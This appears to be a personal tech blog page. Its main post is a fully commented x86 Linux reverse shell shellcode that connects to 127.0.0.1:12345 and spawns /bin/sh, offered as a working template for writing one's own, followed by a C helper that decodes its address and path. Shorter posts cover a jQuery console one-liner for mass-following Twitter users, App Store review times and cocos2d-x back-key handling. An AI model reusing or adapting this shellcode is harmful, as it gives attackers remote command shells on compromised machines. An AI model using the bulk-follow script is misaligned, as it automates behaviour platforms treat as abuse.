x86 reverse shellcode documented example

Writing shellcode is hard: documented references are scarce, and figuring out how to translate function calls into assembly is a pain. I’m posting here a shellcode I wrote a while back. It’s not a perfect example (it could be shorter and more elegant), but it works and does not contain null bytes. It should get you started if you need help writing your own variety of shellcode.

This is reverse shellcode: it connects back to 127.0.0.1 on port 12345, expecting to find a listening server there, and provides it with a shell.

# x86 linux reverse shellcode example
# aviran.org
 
xor eax, eax        # setting eax,ebx,edx to zero
xor ebx, ebx
xor edx, edx
 
push 0x6            # pushing 6,1,2 to the stack
push 0x1            # these are the values for
push 0x2            # socket(2,1,6)
mov ecx, esp        # set args for call
mov bl, 1           # 1 means socket()
mov al, 0x66        # 0x66 = socketcall, the multiplexed socket syscall
int 0x80            # call socket()
mov esi, eax        # sockfd
xor ebx, ebx        # ebx = 0
xor ecx, ecx        # ecx = 0
xor edx, edx        # edx = 0
mov al, 0x66        # socketcall again; relies on eax holding a small sockfd (upper bytes zero)
 
push ebx            # padding
push ebx            # padding
mov bl, 0x3         # ebx = 3 = connect()
 
mov dl,0x1          # pushing sockaddr_in into memory
shl edx,24          # IP,Port,AF_INET; can't push a word, so port and AF_INET are pushed together
mov dl,0x7f         # setting edx to be 0x0100007f - 127.0.0.1
push edx
xor edx,edx         # setting edx to be 0x39300002 - port 12345, AF_INET
mov dx,0x3930       # this is done to avoid null bytes
shl edx,16
mov dl,0x2
push edx
 
mov ecx, esp        # saving location of struct
                    # args for connect
push 0x10           # 0x10 size of struct
push ecx            # ecx - pointer to struct
push esi            # esi sockfd
mov ecx, esp       
int 0x80            # call connect
 
xor eax, eax
xor ebx,ebx
xor ecx,ecx
mov ebx,esi         # sockfd
mov al,0x3f         # dup2
mov cl, 0x2         # ecx = 2 = stderr
int 0x80            # call dup2()
 
xor eax, eax
mov al,0x3f
dec cl              # cl = 1 = stdout
int 0x80            # call dup2
 
xor eax, eax
mov al,0x3f
dec cl              # cl = 0 = stdin
int 0x80            # call dup2
 
xor eax,eax         # eax = 0
xor ecx,ecx         # ecx = 0
xor edx,edx         # edx = 0, used below as the null terminator
 
mov al,11           # execve
push edx            # push 0 for end of string
push 0x68732f6e     # pushing //bin/sh
push 0x69622f2f
mov ebx, esp        # pointer to string
push edx            # push null
mov edx,esp         # edx is the third argument (envp), points to the null dword
push ebx            # push pointer to the path string (argv[0])
mov ecx,esp         # ecx is the second argument (argv)
int 0x80            # make the call
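
For analysts reading a listing like the one above, the following added example (not part of the original post) rebuilds the memory that the pushes create and decodes the connect-back address, port and exec path from the immediates. The helper names are hypothetical; the constants are the ones in the listing.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Successive x86 pushes: the stack grows down, so the last value pushed lands
 * at the lowest address, and each dword is stored little-endian.
 * `pushed` is in push order; `out` receives 4*n bytes in memory order. */
static void stack_image(const uint32_t *pushed, size_t n, uint8_t *out)
{
    for (size_t i = 0; i < n; i++)
        for (int b = 0; b < 4; b++)
            out[4 * i + b] = (uint8_t)(pushed[n - 1 - i] >> (8 * b));
}

/* Register arithmetic from the listing: mov dl,1 / shl edx,24 / mov dl,0x7f */
static uint32_t addr_dword(void) { return ((uint32_t)0x01 << 24) | 0x7f; }
/* mov dx,0x3930 / shl edx,16 / mov dl,2 */
static uint32_t port_family_dword(void) { return ((uint32_t)0x3930 << 16) | 0x02; }

static uint8_t sa[16];            /* reconstructed struct sockaddr_in */
static char ip[16], path[12];

static void build_sockaddr(void)
{
    /* push order in the listing: two zero pads, address, port + family */
    const uint32_t pushed[] = { 0, 0, addr_dword(), port_family_dword() };
    stack_image(pushed, 4, sa);
}

/* sin_family is host order (little-endian); sin_port and sin_addr are network order */
unsigned sockaddr_family(void) { build_sockaddr(); return sa[0] | (sa[1] << 8); }
unsigned sockaddr_port(void)   { build_sockaddr(); return (sa[2] << 8) | sa[3]; }
const char *sockaddr_ip(void)
{
    build_sockaddr();
    snprintf(ip, sizeof ip, "%u.%u.%u.%u", sa[4], sa[5], sa[6], sa[7]);
    return ip;
}

/* execve path: push 0 / push 0x68732f6e / push 0x69622f2f */
const char *exec_path(void)
{
    const uint32_t pushed[] = { 0, 0x68732f6e, 0x69622f2f };
    stack_image(pushed, 3, (uint8_t *)path);
    return path;
}

int main(void)
{
    printf("family=%u port=%u ip=%s path=%s\n",
           sockaddr_family(), sockaddr_port(), sockaddr_ip(), exec_path());
    return 0;
}
```

The same byte-order reasoning applies when pulling a connect-back endpoint out of a captured sample: the family field reads as a little-endian word, while the port and address bytes are already in network order.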

How to mass follow all Twitter users in one page

Here’s a neat trick I found that allows you to follow, in one action, all the Twitter users presented on a single Twitter page. You can use it on the search results or on the Followers or Following page of a given user.

I’m going to show you two similar ways. The first is a bit simpler and should be fine for most purposes; the second is a bit more accurate. In the future you might have to modify them a little, since Twitter might change their HTML (for example, the names of CSS classes).

Twitter uses the jQuery JavaScript framework, so you can call the click() function on the Follow buttons of all the users on that page. At the time of writing this post, the code of every Twitter Follow button is:

<button class="user-actions-follow-button
				js-follow-btn follow-button btn small
				small-follow-btn"
				type="button">
		...
</button>

You can see it uses a few CSS classes; any one of them can be used to query for a list of all of the buttons.

Open the Twitter page on which you want to perform the mass follow and scroll down as far as you want to increase the number of users Twitter is displaying.
Now open your browser’s JavaScript console (usually CTRL+Shift+K or CTRL+Shift+J) and input the following jQuery code:

$('.user-actions-follow-button').click();

Note that in this example I’m using the user-actions-follow-button CSS class name, and that it’s prefixed by a dot to tell jQuery it’s a CSS class.
Once you hit Enter, all the Follow buttons will be clicked.

This method simply clicks every “Follow” button on the page. If you already follow a user on that page, you will effectively click an “Unfollow” button for that user instead.

You can modify the query to select only the buttons for the users you are not following/pending approval and so on by using the following CSS selector:

$('.follow-text:visible').parent().click();

We’re selecting a span inside the button object: if it’s of class .follow-text and it’s visible, we take its parent, the follow button, and perform click() on that button.

Apple iOS application review time

Just sharing my latest experience of publishing an app on the Apple App Store: it took 5 days for the app to go from the initial state of Waiting for Review to In Review, and a little less than 24 hours for it to be approved and Ready for Sale.
So basically, it took Apple 6 days to publish the app; most of the time the app was waiting to be reviewed.

Using the back button on Android with Cocos2d-x 3

Among the many changes made in version 3 of cocos2d-x, CCLayer::backKeyClicked() has been deprecated. So how do you catch that back key click these days?
Here’s how: you need to override Layer::onKeyReleased() and compare the value of keyCode to KEY_ESCAPE, as shown in the following code:

void MyLayer::onKeyReleased(EventKeyboard::KeyCode keyCode, Event *event) {
	if(keyCode == EventKeyboard::KeyCode::KEY_ESCAPE) {
		/*
			Handle the back click
		*/
	}
}

From there you just need to handle the click.
You will also need to enable the Keypad, otherwise the layer will not get notifications on such interactions.
You do that using Layer::setKeyboardEnabled(), set it to true in your Layer’s init() function.
In versions of cocos2d-x 3 prior to v3.3 you would use Layer::setKeypadEnabled() instead, which has been deprecated in later versions.